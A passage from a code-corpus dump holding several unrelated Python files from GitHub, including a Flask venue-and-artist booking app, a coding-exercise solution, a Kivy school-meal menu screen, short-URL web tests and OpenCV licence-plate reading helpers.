Artist.image_link).filter(Artist.id == show.artist_id).one()\n\n show_add = {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n address = request.form.get(\"address\")\n phone = request.form.get(\"phone\")\n image_link = request.form['image_link']\n website = request.form.get(\"website\")\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise) Validated this through Knowledge as well.\n\n seeking_talent = True if 'seeking_talent' in request.form else False \n seeking_description = request.form['seeking_description']\n venue = Venue(\n name=name,\n city=city,\n state=state,\n address=address,\n phone=phone,\n image_link=image_link,\n website=website,\n genres=genres,\n facebook_link=facebook_link,\n seeking_talent=seeking_talent,\n seeking_description=seeking_description\n )\n response[\"name\"] = venue.name\n db.session.add(venue)\n db.session.commit()\n except:\n\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n\n db.session.close()\n if error == False:\n\n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n else:\n\n flash(\"An error occurred. Venue \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n return render_template('pages/home.html')\n\n\n# Update Venue\n# ----------------------------------------------------------------\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n\n form = VenueForm()\n # query database and filter by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n \n # populate the form with Data from DB\n form.name.data = venue.name\n form.city.data = venue.city\n form.state.data = venue.state\n form.address.data = venue.address\n form.phone.data = venue.phone\n form.genres.data = venue.genres\n form.image_link.data = venue.image_link\n form.facebook_link.data = venue.facebook_link\n form.website.data = venue.website\n form.seeking_talent.data = venue.seeking_talent\n form.seeking_description.data = venue.seeking_description\n\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n form = VenueForm(request.form)\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n address = request.form['address']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_talent = True if 'seeking_talent' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get venue by ID\n venue = Venue.query.get(venue_id)\n\n # store updated data in variables\n venue.name = name\n venue.city = city\n venue.state = state\n venue.address = address\n venue.phone = phone\n venue.genres = genres\n venue.image_link = image_link\n venue.facebook_link = facebook_link\n venue.website = website\n venue.seeking_talent = seeking_talent\n venue.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Venue '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Venue '+ name + ' was successfully updated!', 'success'\n )\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Delete Venue\n# ----------------------------------------------------------------\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n error = False\n try:\n # To delete a venue, select venue by ID and db.session.delete\n venue = Venue.query.filter(Venue.id == venue_id).first()\n name = venue.name\n\n db.session.delete(venue)\n db.session.commit()\n\n except:\n\n db.session.rollback()\n flash('An error occurred. Venue ' + name + ' wasn\\'t deleted.')\n finally:\n\n db.session.close()\n if error:\n flash('There was an error')\n else:\n # flash if successful\n flash('Venue was successfully deleted.'\n )\n\n # return success\n return render_template('pages/home.html')\n\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n\n # write a query to get all artists - done\n data = db.session.query(Artist).all()\n\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n #same as venue query\n search_term = request.form.get('search_term', '')\n artists = db.session.query(Artist).filter(Artist.name.ilike('%' + search_term + '%')).all()\n data = []\n\n for artist in artists:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.artist_id == artist.id)\n for show in shows:\n if(show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n data.append({\n \"id\": artist.id,\n \"name\": artist.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n response={\n \"count\": len(artists),\n \"data\": data\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n\n # Create an artist page: 1)query all data from Artist by unique id\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n list_shows = db.session.query(Show).filter(Show.artist_id == artist_id)\n past_shows = []\n upcoming_shows = []\n\n for show in list_shows:\n venue = db.session.query(Venue.name, Venue.image_link).filter(Venue.id == show.venue_id).one()\n\n show_add = {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"venue_image_link\": venue.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n \n form = ArtistForm()\n # query database and filter by ID\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n \n # populate the form with Data from DB\n form.name.data = artist.name\n form.city.data = artist.city\n form.state.data = artist.state\n form.phone.data = artist.phone\n form.genres.data = artist.genres\n form.image_link.data = artist.image_link\n form.facebook_link.data = artist.facebook_link\n form.website.data = artist.website\n form.seeking_venue.data = artist.seeking_venue\n form.seeking_description.data = artist.seeking_description\n\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_venue = True if 'seeking_venue' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get artist by ID\n artist = Artist.query.get(artist_id)\n\n # store updated data in variables\n artist.name = name\n artist.city = city\n artist.state = state\n artist.phone = phone\n artist.genres = genres\n artist.image_link = image_link\n artist.facebook_link = facebook_link\n artist.website = website\n artist.seeking_venue = seeking_venue\n artist.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Artist '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Artist '+ name + ' was successfully updated!', 'success'\n )\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n phone = request.form.get(\"phone\")\n image_link = request.form.get('image_link')\n website = request.form.get('website')\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise)\n seeking_venue = True if 'seeking_venue' in request.form else False \n seeking_description = request.form['seeking_description']\n artist = Artist(\n name=name,\n city=city,\n state=state,\n phone=phone,\n image_link=image_link,\n genres=genres,\n website=website,\n facebook_link=facebook_link,\n seeking_venue=seeking_venue,\n seeking_description=seeking_description\n )\n response[\"name\"] = artist.name\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error == False:\n # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n else:\n flash(\"An error occurred. Artist \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows - done\n #Query shows database and do a join with Venue and Artist\n \n get_shows = db.session.query(Show).join(Venue).join(Artist).all()\n data = []\n # probably use a for loop to display all information from shows.html.\n for show in get_shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name, \n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n error = False\n try: \n artist_id = request.form['artist_id']\n venue_id = request.form['venue_id']\n start_time = request.form['start_time']\n\n print(request.form)\n\n show = Show(artist_id=artist_id, venue_id=venue_id, start_time=start_time)\n db.session.add(show)\n db.session.commit()\n except: \n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally: \n db.session.close()\n if error: \n flash('An error occurred. Show could not be listed.')\n if not error: \n flash('Show was successfully listed')\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"tonyrizzotto/fyyurproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36465121805","text":"#\n# * Core 99, Are Isomorphic\n# * Medium\n\n# * Two two-dimensional arrays are isomorphic if they have the same number of \n# * rows and each pair of respective rows contains the same number of elements.\n\n# Given two two-dimensional arrays, check if they are isomorphic.\n\n# Example\n\n# For\n\n# array1 = [[1, 1, 1],\n# [0, 0]]\n\n# and\n\n# array2 = [[2, 1, 1],\n# [2, 1]]\n\n# the output should be\n# areIsomorphic(array1, array2) = true;\n\n# For\n\n# array1 = [[2],\n# []]\n\n# and\n\n# array2 = [[2]]\n\n# the output should be\n# areIsomorphic(array1, array2) = false.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.array.integer array1\n\n# Guaranteed constraints:\n# 1 ≤ array1.length ≤ 5,\n# 0 ≤ array1[i].length ≤ 5,\n# 0 ≤ array1[i][j] ≤ 50.\n\n# [input] array.array.integer array2\n\n# Guaranteed constraints:\n# 1 ≤ array2.length ≤ 5,\n# 0 ≤ array2[i].length ≤ 5,\n# 0 ≤ array2[i][j] ≤ 50.\n\n# [output] boolean\n\n#%%\n\n# * Solution 1\ndef areIsomorphic(array1:list, array2:list)-> bool:\n n1 = len(array1)\n n2 = len(array2)\n if n1 != n2:\n return False\n for i in range(n1):\n if len(array1[i]) != len(array2[i]):\n return False\n\n return True\n\n\n# * Solution 2\ndef areIsomorphic2(array1:list, array2:list)-> bool:\n return (len(array1) == len(array2)) and all([len(array1[i]) == len(array2[i]) for i in range(len(array1))])\n\n\n# * Solution 3\ndef areIsomorphic3(array1:list, array2:list)-> bool:\n return list(map(len, array1)) == list(map(len, array2))\n\n\na1 = [[1,1,1],[0,0]]\na2 = [[2,1,1],[2,1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2],[1]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)\n\na1 = [[2],[0,0]]\na2 = [[2]]\nr1 = areIsomorphic3(a1, a2)\nprint(r1)","repo_name":"Vagacoder/Codesignal","sub_path":"python/Arcade/Core/C99AreIsomorphic.py","file_name":"C99AreIsomorphic.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"25079118301","text":"#= main_screen =>\nfrom kivymd.app import MDApp\nfrom kivy.clock import Clock, mainthread\nfrom kivy.properties import ObjectProperty, NumericProperty\nfrom kivymd.uix.screen import MDScreen\n\nfrom datetime import datetime, timedelta\nimport threading\n\nfrom database_helpers import get_from_database\nfrom waiter.dataclasses import eAsistentMeal\nfrom waiter.helpers import get_selected, get_monday\n\n\nclass MainScreen(MDScreen):\n \"\"\"Main Screen Class\"\"\"\n date_of_menu = ObjectProperty() # DateTime | displayed date\n meals_back_week = ObjectProperty() # Array | meals for the previous week\n meals_curr_week = ObjectProperty() # Array | meals for the current week\n meals_next_week = ObjectProperty() # Array | meals for the following week\n curr_week_num = NumericProperty() # Integer | num of current week\n\n def __init__(self, **kwargs):\n \"\"\"When Component Initialized\"\"\"\n super().__init__(**kwargs)\n app = MDApp.get_running_app()\n date_today = datetime.now()\n\n self.date_of_menu = date_today\n if self.date_of_menu.strftime(\"%w\") == \"6\": # if day is saturday (no meals)\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\": # if day is sunday (no meals)\n self.date_of_menu += timedelta(days=1)\n\n loading_card = [\n {\n \"text\": \"Loading\",\n \"secondary_text\": \"\",\n \"icon\": \"all-inclusive\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n }\n ]\n self.meals_curr_week = [loading_card for i in range(5)]\n self.create_cards()\n\n if app.logged_in:\n threading.Thread(target=self.get_weekly_data).start()\n\n def on_enter(self):\n \"\"\"When Entering Screen\"\"\"\n app = MDApp.get_running_app()\n if not app.logged_in:\n app.show_dialog(\"Error\", \"Please login!\")\n return\n\n def clear_screen(self):\n \"\"\"Clears Screen\"\"\"\n self.meals_curr_week = [[] for i in range(5)]\n self.meals_back_week = [[] for i in range(5)]\n self.meals_next_week = [[] for i in range(5)]\n self.create_cards()\n\n def get_weekly_data(self):\n \"\"\"Prepares Shown Data\"\"\"\n app = MDApp.get_running_app()\n week_num = int(\n str((get_monday(self.date_of_menu) - app.first_week_school) / 7).split(\" \")[0]\n )\n monday = get_monday(self.date_of_menu)\n\n curr_meals = app.waiter.api.get_meal_data(\n week_num, monday, app.meals\n )\n self.meals_curr_week = self.get_meals(curr_meals)\n next_meals = app.waiter.api.get_meal_data(\n week_num + 1, monday + timedelta(days=7), app.meals\n )\n self.meals_next_week = self.get_meals(next_meals)\n back_meals = app.waiter.api.get_meal_data(\n week_num - 1, monday - timedelta(days=7), app.meals\n )\n self.meals_back_week = self.get_meals(back_meals)\n\n def set_date(*args):\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n Clock.schedule_once(set_date)\n self.create_cards()\n\n def get_meals(self, meals):\n \"\"\"Reformats Fetched Data\"\"\"\n app = MDApp.get_running_app()\n selected_meals = get_selected(meals)\n week_meals = []\n for i in range(5): # each day\n day_meals = []\n tracker = 1\n for meal in meals[i]: # each meal\n if not meal.meal_text:\n no_data = {\n \"text\": \"No Data\",\n \"secondary_text\": \"\",\n \"icon\": \"alert-circle-outline\",\n \"meal_id\": \"000000\",\n \"selected\": False,\n \"changable\": False,\n }\n day_meals = [no_data]\n break\n meal_data = {\n \"text\": meal.meal_text,\n \"secondary_text\": f\"meni {tracker}\",\n \"icon\": app.meals[meal.meal_id],\n \"selected\": meal.selected,\n \"meal_id\": meal.meal_id,\n \"changable\": meal.changable,\n }\n day_meals.append(meal_data)\n tracker += 1\n week_meals.append(day_meals)\n\n return week_meals\n\n @mainthread\n def create_cards(self):\n \"\"\"Populates RecycleView\"\"\"\n self.ids.recycle_view.data = self.meals_curr_week[\n int(self.date_of_menu.strftime(\"%w\")) - 1\n ]\n\n def set_next_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n next_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_next_week = self.get_meals(next_meals)\n\n def set_prev_week(self, date, *args):\n \"\"\"Switches Weeks\"\"\"\n app = MDApp.get_running_app()\n week_num = int(str((get_monday(date) - app.first_week_school) / 7).split(\" \")[0])\n back_meals = app.waiter.api.get_meal_data(week_num, get_monday(date), app.meals)\n self.meals_back_week = self.get_meals(back_meals)\n\n def date_forward(self):\n \"\"\"Toggles Date Forwards\"\"\"\n \"\"\"\n if friday => switches weeks\n if weekend => sets date to next monday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"5\":\n self.meals_back_week = self.meals_curr_week\n self.meals_curr_week = self.meals_next_week\n threading.Thread(\n target=self.set_next_week, args=(self.date_of_menu + timedelta(days=8),)\n ).start()\n\n self.date_of_menu += timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu += timedelta(days=2)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu += timedelta(days=1)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n\n def date_backward(self):\n \"\"\"Toggles Date Backwards\"\"\"\n \"\"\"\n if monday => switches weeks\n if weekend => sets date to last friday\n \"\"\"\n app = MDApp.get_running_app()\n if self.date_of_menu.strftime(\"%w\") == \"1\":\n self.meals_next_week = self.meals_curr_week\n self.meals_curr_week = self.meals_back_week\n threading.Thread(\n target=self.set_prev_week,\n args=(self.date_of_menu - timedelta(days=10),),\n ).start()\n\n self.date_of_menu -= timedelta(days=1)\n if self.date_of_menu.strftime(\"%w\") == \"6\":\n self.date_of_menu -= timedelta(days=1)\n elif self.date_of_menu.strftime(\"%w\") == \"0\":\n self.date_of_menu -= timedelta(days=2)\n app.root.ids.main.ids.date_label.text = str(\n self.date_of_menu.strftime(\"%d. %b. %y\")\n )\n self.create_cards()\n","repo_name":"5KRC1/eAmenu","sub_path":"libs/screens/main_screen/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"2906061622","text":"import pylons\npylons.c = pylons.tmpl_context\nfrom pylons import c\nfrom allura.tests import decorators as td\nfrom alluratest.controller import TestController\n\nfrom forgeshorturl.model import ShortUrl\n\n\nclass TestRootController(TestController):\n def setUp(self):\n super(TestRootController, self).setUp()\n self.setup_with_tools()\n\n @td.with_url\n def setup_with_tools(self):\n pass\n\n def test_shorturl_add(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'test'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/test').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n def test_shorturl_update(self):\n response = self.app.get('/admin/url/add')\n response.form['short_url'] = 'g'\n response.form['full_url'] = 'http://www.google.com/'\n response.form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.google.com/'\n\n response = self.app.get('/url/')\n form = response.forms['update-short-url-form']\n form['short_url'] = 'g'\n form['full_url'] = 'http://www.yahoo.com/'\n form.action = '/admin/url/add/'\n form.submit()\n redirected = self.app.get('/url/g').follow()\n assert redirected.request.url == 'http://www.yahoo.com/'\n\n def test_shorturl_not_found(self):\n self.app.post('/admin/url/add',\n dict(short_url='test',\n full_url='http://www.google.com/',\n description=\"description2\"))\n r = self.app.get('/url/test2', status=404)\n r = self.app.get('/url/')\n assert 'http://www.google.com/' in r\n\n def test_shorturl_private(self):\n self.app.post('/admin/url/add',\n dict(short_url='test_private',\n full_url='http://www.amazone.com/',\n private='on',\n description=\"description1\"))\n r = self.app.get('/url/')\n assert 'http://www.amazone.com/' in r\n assert 'yes ' in r\n self.app.get('/url/test_private',\n extra_environ=dict(username='*anonymous'),\n status=404)\n self.app.get('/url/test_private',\n status=302)\n\n def test_shorturl_errors(self):\n d = dict(short_url='amazone',\n full_url='amazone')\n r = self.app.post('/admin/url/add', params=d)\n assert 'error' in self.webflash(r)\n d = dict(short_url='test', full_url='http://google.com/')\n r = self.app.post('/admin/url/add', params=d)\n d['full_url'] = 'http://yahoo.com'\n r = self.app.post('/admin/url/add', params=d)\n assert 'exists' in self.webflash(r)\n\n def test_shorturl_remove(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 1\n self.app.post('/admin/url/remove', params=dict(shorturl='g'))\n assert ShortUrl.query.find(app_config_id=c.app.config._id).count() == 0\n\n def test_shorturl_permissions(self):\n self.app.post('/admin/url/add',\n params=dict(short_url='g', full_url='http://google.com/'),\n extra_environ=dict(username='test-user'), status=403)\n self.app.post('/admin/url/remove', params=dict(shorturl='g'),\n extra_environ=dict(username='test-user'), status=403)\n","repo_name":"Bitergia/allura","sub_path":"ForgeShortUrl/forgeshorturl/tests/functional/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"11119799083","text":"import cv2\nimport numpy as np\nimport scipy.fftpack\n\ndef percentage_pixel(img):\n\twhite = np.sum(img == 255)\n\tblack = np.sum(img == 0)\n\treturn (white/(white + black)) * 100\n\t\n# Color identification of the number plate using K means clustering\ndef get_color(img):\n\thsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n\tmaskyellow = cv2.inRange(hsv, np.array([20,100,100],dtype = np.uint8), np.array([30,255,255], dtype = np.uint8))\n\tperyellow = percentage_pixel(maskyellow)\n\n\tmaskwhite = cv2.inRange(hsv, np.array([0,0,168],dtype = np.uint8), np.array([172,111,255], dtype = np.uint8))\n\tperwhite = percentage_pixel(maskwhite)\n\n\tnumberplate = {peryellow:'COMMERICIAL',perwhite:'PRIVATE'}\n\n\tif max(perwhite,peryellow) < 30:\n\t\treturn 'OTHER'\n\telse:\n\t\treturn sorted(numberplate.items(), key = lambda x: x[0], reverse = True)[0][1]\n\ndef rotate(olist, rot):\n\tolistnew = []\n\tfor element in olist:\n\t\tx,y,c = element[0], element[1], element[2]\n\t\ttemplist = np.array([[element[0]], [element[1]]])\n\t\ttemplist = np.matmul(rot, templist)\n\t\tx = templist[0][0]\n\t\ty = templist[1][0]\n\t\tolistnew = olistnew + [(x,y,c)]\n\treturn olistnew\n\ndef findstring(elements, threshold):\n\telements.sort(key = lambda x: x[1])\n\tupper = ''\n\tlower = ''\n\tsd = 0\n\tif abs(elements[0][1] - elements[-1][1]) < threshold:\n\t\tprint('Single Line Case')\n\t\tsd = 0\n\telse:\n\t\tprint('Double Line Case')\n\t\tsd = 1\n\tif sd == 0:\n\t\telements.sort(key = lambda x: x[0])\n\t\tfor element in elements:\n\t\t\tupper = upper + element[2]\n\t\treturn upper\n\telse:\n\t\tav = (elements[0][1] + elements[-1][1])/2\n\t\telements.sort(key = lambda x: x[0])\n\t\t\n\t\t#print(av)\n\t\t#print(elements)\n\t\tfor element in elements:\n\t\t\t#print(element[1])\n\t\t\tif element[1] < av:\n\t\t\t\tupper = upper + element[2]\n\t\t\telse:\n\t\t\t\tlower = lower + element[2]\n\t\treturn upper + lower\n\ndef plate_to_string(x_c, y_c, line, line_thresh):\n\tolist = list(zip(x_c, y_c, line))\n\tolist.sort(key = lambda x:x[0])\n\tif len(olist) > 1:\n\t\tif olist[0][1] < olist[1][1]:\n\t\t\tx_1 = olist[1][0]\n\t\t\ty_1 = olist[1][1]\n\t\telse:\n\t\t\tx_1 = olist[0][0]\n\t\t\ty_1 = olist[0][1]\n\t\tif olist[-1][1] < olist[-2][1]:\n\t\t\tx_2 = olist[-2][0]\n\t\t\ty_2 = olist[-2][1]\n\t\telse:\n\t\t\tx_2 = olist[-1][0]\n\t\t\ty_2 = olist[-1][1]\n\t\tif x_2 - x_1 != 0:\t\n\t\t\ttheta = np.arctan((y_1 - y_2)/(x_2 - x_1))\n\t\t\trot = np.array([[np.cos(theta), -np.sin(theta)],[np.sin(theta), np.cos(theta)]])\n\t\t\tolistnew = rotate(olist, rot)\n\t\t\tolistnew.sort(key = lambda x: x[0])\n\t\t\tplate = findstring(olistnew, threshold = line_thresh)\n\t\t\tprint('Plate = ',plate)\n\t\t\treturn plate\n\t\telse:\n\t\t\treturn \" \"\n\telse:\n\t\treturn \" \"\n\ndef padder(h,w,im):\n\tblack = np.zeros((h,w,3),dtype=np.uint8)\n\tim_h,im_w = im.shape[0] , im.shape[1]\n\tblack[:im_h,:im_w,:] = im\n\treturn black\n\ndef imclearborder(imgBW, radius):\n\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n if (int(cv2.__version__[0]) < 4):\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) \n \n\n # Get dimensions of image\n imgRows = imgBW.shape[0]\n imgCols = imgBW.shape[1] \n\n contourList = [] # ID list of contours that touch the border\n\n # For each contour...\n for idx in np.arange(len(contours)):\n # Get the i'th contour\n cnt = contours[idx]\n\n # Look at each point in the contour\n for pt in cnt:\n rowCnt = pt[0][1]\n colCnt = pt[0][0]\n\n # If this is within the radius of the border\n # this contour goes bye bye!\n check1 = (rowCnt >= 0 and rowCnt < radius) or (rowCnt >= imgRows-1-radius and rowCnt < imgRows)\n check2 = (colCnt >= 0 and colCnt < radius) or (colCnt >= imgCols-1-radius and colCnt < imgCols)\n\n if check1 or check2:\n contourList.append(idx)\n break\n\n for idx in contourList:\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\ndef bwareaopen(imgBW, areaPixels):\n # Given a black and white image, first find all of its contours\n imgBWcopy = imgBW.copy()\n\n if (int(cv2.__version__[0]) < 4):\t\n im,contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n contours,hierarchy = cv2.findContours(imgBWcopy.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n \n\n # For each contour, determine its total occupying area\n for idx in np.arange(len(contours)):\n area = cv2.contourArea(contours[idx])\n if (area >= 0 and area <= areaPixels):\n cv2.drawContours(imgBWcopy, contours, idx, (0,0,0), -1)\n\n return imgBWcopy\n\n\n\ndef find_boxes(thresh, drawplates, maxareathresh, minareathresh):\n\ttotal, labels, boxes, centroids = cv2.connectedComponentsWithStats(thresh, 8, cv2.CV_32S)\n\tif total > 1:\n\t\tif drawplates:\n\t\t\tthresh = cv2.cvtColor(thresh, cv2.COLOR_GRAY2BGR)\n\t\tcc = []\n\t\tcentroid = []\n\t\ti = 0\n\t\twhile(i < total):\n\t\t\tx1 = int(boxes[i][0])\n\t\t\ty1 = int(boxes[i][1])\n\t\t\tx2 = x1 + int(boxes[i][2])\n\t\t\ty2 = y1 + int(boxes[i][3])\n\t\t\tif boxes[i][4] < maxareathresh and minareathresh < boxes[i][4]:\n\t\t\t\t#cc = np.append(cc, np.array([[x1,y1,x2,y2]]), axis = 